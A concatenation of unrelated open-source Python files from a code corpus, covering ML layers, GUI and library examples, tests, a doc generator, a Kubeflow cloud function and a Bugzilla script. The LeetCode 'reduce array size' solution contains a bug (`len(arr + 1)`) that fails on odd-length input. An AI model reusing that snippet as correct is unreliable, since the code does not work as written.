bias_initializer (TYPE, optional): Initialisation of bias
kernel_regularizer (None, optional): Additional regularisation op
bias_regularizer (None, optional): Additional regularisation op
Returns:
tf.Tensor: Output of the residual unit
"""
pool_op = tf.layers.max_pooling3d
conv_params = {'padding': 'same',
'use_bias': use_bias,
'kernel_initializer': kernel_initializer,
'bias_initializer': bias_initializer,
'kernel_regularizer': kernel_regularizer,
'bias_regularizer': bias_regularizer}
in_filters = inputs.get_shape().as_list()[-1]
assert in_filters == inputs.get_shape().as_list()[-1], \
'Module was initialised for a different input shape'
x = inputs
orig_x = x
# Handle strided convolutions
if np.prod(strides) != 1:
orig_x = pool_op(inputs=orig_x,
pool_size=strides,
strides=strides,
padding='valid')
# Sub unit 0
with tf.variable_scope('sub_unit0'):
# Adjust the strided conv kernel size to prevent losing information
k = [s * 2 if s > 1 else k for k, s in zip(kernel_size, strides)]
x = tf.layers.batch_normalization(
x, training=mode == tf.estimator.ModeKeys.TRAIN)
x = activation(x)
x = tf.layers.conv3d(
inputs=x,
filters=out_filters,
kernel_size=k, strides=strides,
**conv_params)
# Sub unit 1
with tf.variable_scope('sub_unit1'):
x = tf.layers.batch_normalization(
x, training=mode == tf.estimator.ModeKeys.TRAIN)
x = activation(x)
x = tf.layers.conv3d(
inputs=x,
filters=out_filters,
kernel_size=kernel_size,
strides=(1, 1, 1),
**conv_params)
# Add the residual
with tf.variable_scope('sub_unit_add'):
# Handle differences in input and output filter sizes
if in_filters < out_filters:
orig_x = tf.pad(
tensor=orig_x,
paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[
int(np.floor((out_filters - in_filters) / 2.)),
int(np.ceil((out_filters - in_filters) / 2.))]])
elif in_filters > out_filters:
orig_x = tf.layers.conv3d(
inputs=orig_x,
filters=out_filters,
kernel_size=kernel_size,
strides=(1, 1, 1),
**conv_params)
x += orig_x
return x
|
examples/simpleApp.py | tgolsson/appJar | 666 | 12796601 | <filename>examples/simpleApp.py
# import the library
from appJar import gui
app = gui() # top slice - CREATE the GUI
app.addLabel("title", "Welcome to appJar") # add a label
app.setLabelBg("title", "red") # set the label's background to be red
app.go() # bottom slice - START the GUI
|
coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py | LeandroTk/Algorithms | 205 | 12796620 | <reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py
# https://leetcode.com/problems/reduce-array-size-to-the-half
'''
Time Complexity: O(NlogN)
Space Complexity: O(N)
'''
def min_set_size(arr):
num_to_count, counts, min_size, current_length = {}, [], 0, len(arr)
for num in arr:
if num in num_to_count:
num_to_count[num] += 1
else:
num_to_count[num] = 1
for num in num_to_count:
counts.append(num_to_count[num])
counts = reversed(sorted(counts))
if len(arr) % 2 == 0:
cut = len(arr) / 2
else:
cut = len(arr + 1) / 2
for count in counts:
min_size += 1
current_length -= count
if current_length <= cut:
return min_size
return min_size
|
configs/nas_fcos/ranksort_nas_fcos_r50_caffe_fpn_1x_coco_lr0010.py | yinchimaoliang/ranksortloss | 210 | 12796621 | _base_ = 'ranksort_nas_fcos_r50_caffe_fpn_1x_coco.py'
optimizer = dict(lr=0.010)
|
Scripts/s4cl_tests/utils/common_function_utils_tests.py | ColonolNutty/Sims4CommunityLibrary | 118 | 12796652 | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils
from sims4communitylib.testing.common_test_service import CommonTestService
from sims4communitylib.utils.common_function_utils import CommonFunctionUtils
# noinspection PyMissingOrEmptyDocstring
@CommonTestService.test_class(ModInfo.get_identity())
class CommonFunctionUtilsTests:
@staticmethod
@CommonTestService.test(True, True, True, True)
@CommonTestService.test(True, False, True, False)
@CommonTestService.test(True, False, False, True)
@CommonTestService.test(False, False, False, False)
def run_predicates_as_one_should_work_properly(func_result_one: bool, func_result_two: bool, all_must_pass: bool, expected_result: bool):
def _function_one(*_, **__) -> Any:
return func_result_one
def _function_two(*_, **__) -> Any:
return func_result_two
result = CommonFunctionUtils.run_predicates_as_one((_function_one, _function_two), all_must_pass=all_must_pass)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test(True, False)
@CommonTestService.test(False, True)
def run_predicate_with_reversed_result_should_work_properly(func_result: bool, expected_result: bool):
def _function(*_, **__) -> Any:
return func_result
result = CommonFunctionUtils.run_predicate_with_reversed_result(_function)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test()
def run_with_arguments_should_work_properly() -> None:
_additional_value = 'No'
_additional_key_word_value = 'What'
normal_val = 'one'
normal_key_val = 'two'
def _function(normal_arg: str, value_one: str, normal_key_arg: str=None, key_value: str=None) -> Any:
CommonAssertionUtils.are_equal(value_one, _additional_value)
CommonAssertionUtils.are_equal(key_value, _additional_key_word_value)
CommonAssertionUtils.are_equal(normal_arg, normal_val)
CommonAssertionUtils.are_equal(normal_key_arg, normal_key_val)
if normal_arg == normal_val and normal_key_arg == normal_key_val and value_one == _additional_value and key_value == _additional_key_word_value:
return True
result = CommonFunctionUtils.run_with_arguments(_function, _additional_value, key_value=_additional_key_word_value)(normal_val, normal_key_arg=normal_key_val)
CommonAssertionUtils.is_true(result, message='Failed to send proper arguments: {}'.format(result))
|
Stock/Data/Engine/Common/DyStockDataCommonEngine.py | Leonardo-YXH/DevilYuan | 135 | 12796671 | <filename>Stock/Data/Engine/Common/DyStockDataCommonEngine.py
from .DyStockDataCodeTable import *
from .DyStockDataTradeDayTable import *
from .DyStockDataSectorCodeTable import *
class DyStockDataCommonEngine(object):
""" 代码表和交易日数据引擎 """
def __init__(self, mongoDbEngine, gateway, info):
self._mongoDbEngine = mongoDbEngine
self._gateway = gateway
self._info = info
self._codeTable = DyStockDataCodeTable(self._mongoDbEngine, self._gateway, self._info)
self._tradeDayTable = DyStockDataTradeDayTable(self._mongoDbEngine, self._gateway, self._info)
self._sectorCodeTable = DyStockDataSectorCodeTable(self._mongoDbEngine, self._gateway, self._info)
def updateCodes(self):
return self._codeTable.update()
def updateTradeDays(self, startDate, endDate):
return self._tradeDayTable.update(startDate, endDate)
def updateSectorCodes(self, sectorCode, startDate, endDate):
return self._sectorCodeTable.update(sectorCode, startDate, endDate)
def updateAllSectorCodes(self, startDate, endDate):
return self._sectorCodeTable.updateAll(startDate, endDate)
def getTradeDays(self, startDate, endDate):
return self._tradeDayTable.get(startDate, endDate)
def getLatestDateInDb(self):
return self._tradeDayTable.getLatestDateInDb()
def getLatestTradeDayInDb(self):
return self._tradeDayTable.getLatestTradeDayInDb()
def getIndex(self, code):
return self._codeTable.getIndex(code)
def getCode(self, name):
return self._codeTable.getCode(name)
def getIndexStockCodes(self, index=None):
return self._codeTable.getIndexStockCodes(index)
def getIndexSectorStockCodes(self, index=None):
if index in DyStockCommon.sectors:
return self._sectorCodeTable.getSectorStockCodes(index)
return self._codeTable.getIndexStockCodes(index)
@property
def shIndex(self):
return self._codeTable.shIndex
@property
def szIndex(self):
return self._codeTable.szIndex
@property
def cybIndex(self):
return self._codeTable.cybIndex
@property
def zxbIndex(self):
return self._codeTable.zxbIndex
@property
def etf50(self):
return self._codeTable.etf50
@property
def etf300(self):
return self._codeTable.etf300
@property
def etf500(self):
return self._codeTable.etf500
@property
def stockFunds(self):
return self._codeTable.stockFunds
@property
def stockSectors(self):
return self._codeTable.stockSectors
@property
def stockCodesFunds(self):
return self._codeTable.stockCodesFunds
@property
def stockAllCodesFunds(self):
return self._codeTable.stockAllCodesFunds
@property
def stockAllCodesFundsSectors(self):
return self._codeTable.stockAllCodesFundsSectors
@property
def stockAllCodes(self):
return self._codeTable.stockAllCodes
@property
def stockCodes(self):
return self._codeTable.stockCodes
@property
def stockIndexes(self):
return self._codeTable.stockIndexes
@property
def stockIndexesSectors(self):
return self._codeTable.stockIndexesSectors
def tDaysOffset(self, base, n):
return self._tradeDayTable.tDaysOffset(base, n)
def tDaysOffsetInDb(self, base, n=0):
return self._tradeDayTable.tDaysOffsetInDb(base, n)
def tDays(self, start, end):
return self._tradeDayTable.get(start, end)
def tDaysCountInDb(self, start, end):
return self._tradeDayTable.tDaysCountInDb(start, end)
def tLatestDay(self):
return self._tradeDayTable.tLatestDay()
def tOldestDay(self):
return self._tradeDayTable.tOldestDay()
def isInTradeDayTable(self, startDate, endDate):
return self._tradeDayTable.isIn(startDate, endDate)
def load(self, dates, codes=None):
if not self._codeTable.load(codes):
return False
return self._tradeDayTable.load(dates)
def loadCodeTable(self, codes=None):
return self._codeTable.load(codes)
def loadTradeDays(self, dates):
return self._tradeDayTable.load(dates)
def loadSectorCodeTable(self, sectorCode, date, codes=None):
return self._sectorCodeTable.load(sectorCode, date, codes)
def getSectorCodes(self, sectorCode):
return self._sectorCodeTable.getSectorStockCodes(sectorCode) |
hackerrank/data-structures/2d-array.py | Ashindustry007/competitive-programming | 506 | 12796688 | #!/usr/bin/env python3
# https://www.hackerrank.com/challenges/2d-array
a=[0]*6
for i in range(6): a[i]=[int(x) for x in input().split()]
c=-9*9
for i in range(1,5):
for j in range(1,5):
c=max(c,a[i-1][j-1]+a[i-1][j]+a[i-1][j+1]+a[i][j]+a[i+1][j-1]+a[i+1][j]+a[i+1][j+1])
print(c)
|
tools/doc2md.py | wiltonlazary/Nidium | 1,223 | 12796710 | #!/usr/bin/env python2.7
import json
from pprint import pprint
import os
import sys
import re
import dokumentor
import subprocess
def parseParam(arg, indent=0, isReturn=False):
out = ""
if isReturn:
out += "Returns (%s): %s\n" % (parseParamsType(arg["typed"]), arg["description"])
else:
out += "%s* `%s` (%s): %s\n" % (' ' * indent, arg["name"], parseParamsType(arg["typed"]), arg["description"])
if "params" in arg:
# Callback function
for subArg in arg["params"]:
out += parseParam(subArg, indent + 4)
elif type(arg["typed"][0]) is dict:
# Object
for subArg in arg["typed"][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
elif type(arg["typed"][0]) is list:
# Array of Object
for subArg in arg["typed"][0][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
return out
def parseParamsType(types):
out = ""
comma = ""
for t in types:
out += comma
if type(t) is list:
out += "Object[]"
elif type(t) is dict:
out += "Object"
else:
if t[0] == "[":
out += t[1:-1].capitalize() + "[]"
else:
if t == "null":
out += t
else:
out += t if t[0].isupper() else t.capitalize()
comma = " | "
return out
def parseMethod(method, isEvent=False):
out = ""
if isEvent:
out += "\n## Event: %s\n" % (re.sub("[A-Za-z_0-9]+\.", "", method["name"]))
else:
fnArgs = ""
if len(method["params"]) > 0:
comma = ""
for arg in method["params"]:
name = comma + arg["name"]
if arg["default"] != "None":
name += "=%s" % arg["default"]
if arg["is_optional"]:
name = "[%s]" % name
fnArgs += name
comma = ", "
out += "\n## %s%s%s(%s)\n" % ("`static `" if method["is_static"] else "",
"new " if method["is_constructor"] else "",
method["name"],
fnArgs)
if method["is_slow"]:
out += "<!-- YAML\n- Slow method\n-->\n"
out += method["description"] + "\n"
if len(method["params"]) > 0:
out += "\nParams:\n"
for arg in method["params"]:
out += parseParam(arg)
if method["returns"] and not method["is_constructor"]:
if method["returns"]["nullable"]:
method["returns"]["typed"].append("null")
tmp = parseParam(method["returns"], isReturn=True)
if tmp:
out += "\n" + tmp
out += parseSeeAlso(method["sees"])
return out
def parseProperty(prop):
out = ""
out += "\n## %s%s%s%s (%s)\n" % ("`static` " if prop["is_static"] else "",
"`readonly` " if prop["is_readonly"] else "",
prop["name"],
"=" + prop["default"] if prop["default"] != "None" else "",
parseParamsType(prop["typed"]))
out += prop["description"] + "\n"
out += parseExample(prop["examples"])
out += parseSeeAlso(prop["sees"])
return out
def parseSeeAlso(seeAlso):
return ""
"""
out = ""
if len(seeAlso) > 0:
out += "\nSee also:\n"
for see in seeAlso:
out += "* `%s`\n" % (see["data"])
return out
"""
def parseExample(examples):
out = ""
if len(examples) > 0:
out += "\n"
for ex in examples:
out += "\n```%s\n%s\n```\n" % (ex["language"], ex["data"])
return out
def parse(klass, data):
out = ""
out += "# Class: %s" % (klass) + "\n"
item = data["base"][klass]
out += item["description"]
out += parseExample(item["examples"])
out += parseSeeAlso(item["sees"])
if data["constructors"]:
out += parseMethod(data["constructors"][klass])
if data["methods"]:
for name, method in data["methods"].iteritems():
out += parseMethod(method)
if data["static_methods"]:
for name, method in data["static_methods"].iteritems():
out += parseMethod(method)
if data["properties"]:
for name, prop in data["properties"].iteritems():
out += parseProperty(prop)
if data["events"]:
for evName, ev in data["events"].iteritems():
out += parseMethod(ev, isEvent=True)
return out
print("Running dokumentor")
class captureDokumentor:
def __init__(self):
self.data = ""
def write(self, msg):
self.data += msg
def flush(self=None):
pass
sys.stdout = captureDokumentor()
dokumentor.process("../docs/")
docs = sys.modules['DOCC'].DOC
dokumentor.report("json", docs)
data = json.loads(sys.stdout.data)
sys.stdout = sys.__stdout__
hierarchy = {}
for section, items in data["_sections"].iteritems():
if section not in data:
data[section] = {"base": { section: {"description": "", "sees":[], "examples": {}}}, "constructors": {}, "methods": [], "properties": [], "events":[], "static_methods": []}
hierarchy[section] = {"data": parse(section, data[section])}
hierarchy[section]["children"] = {}
for klass in items:
hierarchy[section]["children"][klass] = parse(klass, data[klass])
path = "../docs/en/api/"
try:
os.mkdir(path)
except:
pass
for directory in hierarchy:
if len(hierarchy[directory]["children"]) > 1:
subPath = path + directory + "/"
try:
os.mkdir(subPath)
except:
pass
print("Writing %s" % subPath + directory + ".md")
with open(subPath + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
for child in hierarchy[directory]["children"]:
print(" - Writing %s" % subPath + child + ".md")
with open(subPath + child + ".md", "w") as f:
f.write(hierarchy[directory]["children"][child])
else:
print("Writing %s" % path + directory + ".md")
with open(path + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
|
ml/notebook_examples/functions/main.py | bhjeong-goldenplanet/automl | 146 | 12796718 | <filename>ml/notebook_examples/functions/main.py
import logging
import datetime
import logging
import time
import kfp
import kfp.compiler as compiler
import kfp.dsl as dsl
import requests
# TODO: replace yours
# HOST = 'https://<yours>.pipelines.googleusercontent.com'
HOST = 'https://7c7f7f3e3d11e1d4-dot-us-central2.pipelines.googleusercontent.com'
@dsl.pipeline(
name='Sequential',
description='A pipeline with two sequential steps.'
)
def sequential_pipeline(filename='gs://ml-pipeline-playground/shakespeare1.txt'):
"""A pipeline with two sequential steps."""
op1 = dsl.ContainerOp(
name='filechange',
image='library/bash:4.4.23',
command=['sh', '-c'],
arguments=['echo "%s" > /tmp/results.txt' % filename],
file_outputs={'newfile': '/tmp/results.txt'})
op2 = dsl.ContainerOp(
name='echo',
image='library/bash:4.4.23',
command=['sh', '-c'],
arguments=['echo "%s"' % op1.outputs['newfile']]
)
def get_access_token():
url = 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
r = requests.get(url, headers={'Metadata-Flavor': 'Google'})
r.raise_for_status()
access_token = r.json()['access_token']
return access_token
def hosted_kfp_test(data, context):
logging.info('Event ID: {}'.format(context.event_id))
logging.info('Event type: {}'.format(context.event_type))
logging.info('Data: {}'.format(data))
logging.info('Bucket: {}'.format(data['bucket']))
logging.info('File: {}'.format(data['name']))
file_uri = 'gs://%s/%s' % (data['bucket'], data['name'])
logging.info('Using file uri: %s', file_uri)
logging.info('Metageneration: {}'.format(data['metageneration']))
logging.info('Created: {}'.format(data['timeCreated']))
logging.info('Updated: {}'.format(data['updated']))
token = get_access_token()
logging.info('attempting to launch pipeline run.')
ts = int(datetime.datetime.utcnow().timestamp() * 100000)
client = kfp.Client(host=HOST, existing_token=token)
compiler.Compiler().compile(sequential_pipeline, '/tmp/sequential.tar.gz')
exp = client.create_experiment(name='gcstriggered') # this is a 'get or create' op
res = client.run_pipeline(exp.id, 'sequential_' + str(ts), '/tmp/sequential.tar.gz',
params={'filename': file_uri})
logging.info(res)
|
tha2/nn/batch_module/batch_input_module.py | luuil/talking-head-anime-2-demo | 626 | 12796719 | from abc import ABC, abstractmethod
from typing import List
from torch import Tensor
from torch.nn import Module
from tha2.nn.base.module_factory import ModuleFactory
class BatchInputModule(Module, ABC):
def __init__(self):
super().__init__()
@abstractmethod
def forward_from_batch(self, batch: List[Tensor]):
pass
class BatchInputModuleFactory(ModuleFactory):
def __init__(self):
super().__init__()
@abstractmethod
def create(self) -> BatchInputModule:
pass
|
tools/sample.py | VanessaDo/cloudml-samples | 1,552 | 12796723 | <gh_stars>1000+
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multiline docstrings should
work but could be problematic.
"""
# This is safer.
"""Sample of what to_ipynb.py does"""
# Consecutive Comments are grouped into the same markdown cell.
# The leading '#' symbol is removed so the markdown cells look better.
# *It is okay to use [markdown](https://www.google.com/search?q=markdown).*
import argparse
import os
# Consecutive imports are grouped into a cell.
# Comments cause a new cell to be created, but blank lines between imports are ignored.
# This next import should say `from helpers import ...` even if its source says `from module.helpers import ...`
# Code manipulation is registered in `samples.yaml`.
from module.helpers import (
some_function)
import yyy
import zzz
# Top level classes, function definitions, and expressions are in their own cells.
class A(object): # Inline comments are left as is.
# Inner comments are left as is.
def __init__(self):
pass
class B(object):
pass
def func(arg):
"""Docstrings are left as is"""
def inner_func():
print(arg)
return inner_func
a = A()
print(a)
# This is a markdown cell.
def main(args):
help(func)
# The last thing of the .py file must be the `if __name__ == '__main__':` block.
if __name__ == '__main__':
# Its content is grouped into the last code cell.
# All args should have a default value if the notebook is expected to be runnable without code change.
parser = argparse.ArgumentParser()
parser.add_argument(
'--job-dir',
type=str,
help='Job dir',
default='/tmp/sample'
)
# Use parse_known_args to ignore args passed in when running as a notebook.
args, _ = parser.parse_known_args()
main(args)
|
iota/commands/extended/broadcast_and_store.py | EasonC13/iota.py | 347 | 12796728 | <reponame>EasonC13/iota.py<gh_stars>100-1000
from iota.commands import FilterCommand
from iota.commands.core.broadcast_transactions import \
BroadcastTransactionsCommand
from iota.commands.core.store_transactions import StoreTransactionsCommand
import asyncio
__all__ = [
'BroadcastAndStoreCommand',
]
class BroadcastAndStoreCommand(FilterCommand):
"""
Executes ``broadcastAndStore`` extended API command.
See :py:meth:`iota.api.Iota.broadcast_and_store` for more info.
"""
command = 'broadcastAndStore'
def get_request_filter(self):
pass
def get_response_filter(self):
pass
async def _execute(self, request: dict) -> dict:
# Submit the two coroutines to the already running event loop
await asyncio.gather(
BroadcastTransactionsCommand(self.adapter)(**request),
StoreTransactionsCommand(self.adapter)(**request),
)
return {
'trytes': request['trytes'],
}
|
reddit2telegram/new_channel.py | soulofrubber/reddit2telegram | 187 | 12796746 | #encoding:utf-8
import os
import utils.channels_stuff
def run_script(channel):
os.system('python supplier.py --sub ' + channel.lower())
def med_fashioned_way():
subreddit_name = input('Subreddit name: ')
channel_name = input('Channel name: ')
tags = input('#Tags #in #that #way: ')
print('Submodule is created.')
utils.channels_stuff.set_new_channel(channel_name, subreddit=subreddit_name, tags=tags.lower())
print(channel_name.lower())
print('Run the bot for the first time.')
run_script(channel_name)
print('Done.')
if __name__ == '__main__':
med_fashioned_way()
|
estruturais/flyweight/main.py | caio-bernardo/design-patterns-python | 363 | 12796753 | class KarakTea:
def __init__(self, tea_type):
self.__tea_type = tea_type
@property
def tea_type(self):
return self.__tea_type
class TeaMaker:
def __init__(self):
self.__available_tea = dict()
def make(self, preference):
if preference not in self.__available_tea:
self.__available_tea[preference] = KarakTea(preference)
return self.__available_tea[preference]
class TeaShop:
def __init__(self, tea_maker):
self.__orders = dict()
self.__tea_maker = tea_maker
def take_order(self, tea_type, table):
if table not in self.__orders:
self.__orders[table] = list()
self.__orders[table].append(self.__tea_maker.make(tea_type))
def serve(self):
for table, orders in self.__orders.items():
print('Serving tea to table {}'.format(table))
if __name__ == '__main__':
tea_maker = TeaMaker()
shop = TeaShop(tea_maker)
shop.take_order('red tea', 1)
shop.take_order('red tea more sugar', 2)
shop.take_order('red tea more milk', 3)
shop.serve()
|
py/tests/test_nil.py | JakeMakesStuff/erlpack | 108 | 12796757 | from __future__ import absolute_import
from erlpack import pack
def test_nil():
assert pack(None) == b'\x83s\x03nil'
|
dataviva/apps/user/forms.py | joelvisroman/dataviva-site | 126 | 12796766 | <reponame>joelvisroman/dataviva-site
from flask_wtf import Form
from wtforms import TextField, DateField, BooleanField, HiddenField, validators, PasswordField, SelectField
class SignupForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
fullname = TextField('fullname', validators=[validators.Required(),
validators.Length(min=3, max=128,
message='Name field must be between 3 and 128 characters long.')])
password = PasswordField('password', validators=[validators.Required(),
validators.EqualTo('confirm',
message='Passwords must match')])
confirm = PasswordField('confirm', validators=[validators.Required()])
agree_mailer = BooleanField('agree_mailer')
class SigninForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
password = PasswordField('password', validators=[validators.Required()])
class ChangePasswordForm(Form):
current_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
new_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
confirm = PasswordField('confirm', validators=[validators.Required(), validators.EqualTo(
'<PASSWORD>password', message='Passwords must match')])
class LoginForm(Form):
provider = HiddenField('provider', validators=[validators.Required()])
remember_me = BooleanField('remember_me', default=False)
class ForgotPasswordForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
class ProfileForm(Form):
fullname = TextField('fullname', validators=[validators.Required(), validators.Length(min=3, max=128, message='Name field must be between 3 and 128 characters long.')])
email = TextField('email', validators=[validators.Required(), validators.Email()])
birthday = DateField('birthday', validators=[ validators.Required()],format='%d/%m/%Y', description='Date format: day/month/year')
country = TextField('country', validators=[validators.Required(), validators.Length(max=50, message='Country field must be 50 characters long.')])
state_province_region = TextField('state_province_region', validators=[validators.Required(), validators.Length( max=50, message='Format error.')])
city = TextField('city', validators=[validators.Required(), validators.Length(max=50, message='City field must be 50 characters long.')])
profile = SelectField('gender', choices=[('development_agents', 'Development Agents'),('entrepreneurs', 'Entrepreneurs'), ('students', 'Students and Professionals')])
occupation = TextField('occupation', validators=[validators.Required(), validators.Length(max=50, message='Occupation field must be 50 characters long.')])
institution = TextField('institution', validators=[validators.Optional(), validators.Length(max=50, message='Institution field must be 50 characters long.')])
agree_mailer = BooleanField('agree_mailer')
|
osp/institutions/utils.py | davidmcclure/open-syllabus-project | 220 | 12796785 | <reponame>davidmcclure/open-syllabus-project
import tldextract
import re
from urllib.parse import urlparse
def seed_to_regex(seed):
"""
Given a URL, make a regex that matches child URLs.
Args:
seed (str)
Returns: regex
"""
parsed = urlparse(seed)
# 1 -- If the seed has a non-www subdomain, require a matching subdomain.
subdomain = ''
tld = tldextract.extract(seed)
if tld.subdomain and tld.subdomain != 'www':
subdomain = '[./]'+tld.subdomain
# 3 -- yale.edu
netloc = '[./]{0}.{1}'.format(tld.domain, tld.suffix)
# 3 -- If a path is present, require a sub-path.
path = ''
clean_path = parsed.path.rstrip('/')
if clean_path:
path = re.escape(clean_path+'/')
# Join the parts.
pattern = ''.join([subdomain, netloc, path])
return re.compile(pattern, re.I)
def strip_csv_row(row):
"""
Strip values in a CSV row, casing '' -> None.
"""
return {
key: val.strip() or None
for key, val in row.items()
}
|
jiant/jiant/modules/cove/cove/encoder.py | amirziai/cs229-project | 500 | 12796787 | <gh_stars>100-1000
import os
import torch
from torch import nn
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
import torch.utils.model_zoo as model_zoo
model_urls = {
'wmt-lstm' : 'https://s3.amazonaws.com/research.metamind.io/cove/wmtlstm-8f474287.pth'
}
MODEL_CACHE = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.torch')
class MTLSTM(nn.Module):
def __init__(self, n_vocab=None, vectors=None, residual_embeddings=False, layer0=False, layer1=True, trainable=False, model_cache=MODEL_CACHE):
"""Initialize an MTLSTM. If layer0 and layer1 are True, they are concatenated along the last dimension so that layer0 outputs
contribute the first 600 entries and layer1 contributes the second 600 entries. If residual embeddings is also true, inputs
are also concatenated along the last dimension with any outputs such that they form the first 300 entries.
Arguments:
n_vocab (int): If not None, initialize MTLSTM with an embedding matrix with n_vocab vectors
vectors (Float Tensor): If not None, initialize embedding matrix with specified vectors (These should be 300d CommonCrawl GloVe vectors)
residual_embedding (bool): If True, concatenate the input GloVe embeddings with contextualized word vectors as final output
layer0 (bool): If True, return the outputs of the first layer of the MTLSTM
layer1 (bool): If True, return the outputs of the second layer of the MTLSTM
trainable (bool): If True, do not detach outputs; i.e. train the MTLSTM (recommended to leave False)
model_cache (str): path to the model file for the MTLSTM to load pretrained weights (defaults to the best MTLSTM from (McCann et al. 2017) --
that MTLSTM was trained with 300d 840B GloVe on the WMT 2017 machine translation dataset.
"""
super(MTLSTM, self).__init__()
self.layer0 = layer0
self.layer1 = layer1
self.residual_embeddings = residual_embeddings
self.trainable = trainable
self.embed = False
if n_vocab is not None:
self.embed = True
self.vectors = nn.Embedding(n_vocab, 300)
if vectors is not None:
self.vectors.weight.data = vectors
state_dict = model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache)
if layer0:
layer0_dict = {k: v for k, v in state_dict.items() if 'l0' in k}
self.rnn0 = nn.LSTM(300, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn0.load_state_dict(layer0_dict)
if layer1:
layer1_dict = {k.replace('l1', 'l0'): v for k, v in state_dict.items() if 'l1' in k}
self.rnn1 = nn.LSTM(600, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(layer1_dict)
elif layer1:
self.rnn1 = nn.LSTM(300, 300, num_layers=2, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache))
else:
raise ValueError('At least one of layer0 and layer1 must be True.')
def forward(self, inputs, lengths, hidden=None):
"""
Arguments:
inputs (Tensor): If MTLSTM handles embedding, a Long Tensor of size (batch_size, timesteps).
Otherwise, a Float Tensor of size (batch_size, timesteps, features).
lengths (Long Tensor): lenghts of each sequence for handling padding
hidden (Float Tensor): initial hidden state of the LSTM
"""
if self.embed:
inputs = self.vectors(inputs)
if not isinstance(lengths, torch.Tensor):
lengths = torch.Tensor(lengths).long()
if inputs.is_cuda:
with torch.cuda.device_of(inputs):
lengths = lengths.cuda(torch.cuda.current_device())
lens, indices = torch.sort(lengths, 0, True)
outputs = [inputs] if self.residual_embeddings else []
len_list = lens.tolist()
packed_inputs = pack(inputs[indices], len_list, batch_first=True)
if self.layer0:
outputs0, hidden_t0 = self.rnn0(packed_inputs, hidden)
unpacked_outputs0 = unpack(outputs0, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs0 = unpacked_outputs0[_indices]
outputs.append(unpacked_outputs0)
packed_inputs = outputs0
if self.layer1:
outputs1, hidden_t1 = self.rnn1(packed_inputs, hidden)
unpacked_outputs1 = unpack(outputs1, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs1 = unpacked_outputs1[_indices]
outputs.append(unpacked_outputs1)
outputs = torch.cat(outputs, 2)
return outputs if self.trainable else outputs.detach()
|
scripts/sprint_report.py | AndrewDVXI/kitsune | 929 | 12796792 | <gh_stars>100-1000
#!/usr/bin/env python
import logging
import sys
import textwrap
import xmlrpc.client
USAGE = 'Usage: sprint_report.py <SPRINT>'
HEADER = 'sprint_report.py: your friendly report view of the sprint!'
# Note: Most of the bugzila api code comes from Scrumbugz.
cache = {}
log = logging.getLogger(__name__)
BZ_URL = 'http://bugzilla.mozilla.org/xmlrpc.cgi'
SESSION_COOKIES_CACHE_KEY = 'bugzilla-session-cookies'
BZ_RESOLUTIONS = ['', 'FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE',
'WORKSFORME', 'DUPLICATE']
BZ_FIELDS = [
'id',
'status',
'resolution',
'summary',
'whiteboard',
'assigned_to',
'priority',
'severity',
'product',
'component',
'blocks',
'depends_on',
'creation_time',
'last_change_time',
'target_milestone',
]
UNWANTED_COMPONENT_FIELDS = [
'sort_key',
'is_active',
'default_qa_contact',
'default_assigned_to',
'description'
]
class SessionTransport(xmlrpc.client.SafeTransport):
"""
XML-RPC HTTPS transport that stores auth cookies in the cache.
"""
_session_cookies = None
@property
def session_cookies(self):
if self._session_cookies is None:
cookie = cache.get(SESSION_COOKIES_CACHE_KEY)
if cookie:
self._session_cookies = cookie
return self._session_cookies
def parse_response(self, response):
cookies = self.get_cookies(response)
if cookies:
self._session_cookies = cookies
cache.set(SESSION_COOKIES_CACHE_KEY,
self._session_cookies, 0)
log.debug('Got cookie: %s', self._session_cookies)
return xmlrpc.client.Transport.parse_response(self, response)
def send_host(self, connection, host):
cookies = self.session_cookies
if cookies:
for cookie in cookies:
connection.putheader('Cookie', cookie)
log.debug('Sent cookie: %s', cookie)
return xmlrpc.client.Transport.send_host(self, connection, host)
def get_cookies(self, response):
cookie_headers = None
if hasattr(response, 'msg'):
cookies = response.msg.getheaders('set-cookie')
if cookies:
log.debug('Full cookies: %s', cookies)
cookie_headers = [c.split(';', 1)[0] for c in cookies]
return cookie_headers
class BugzillaAPI(xmlrpc.client.ServerProxy):
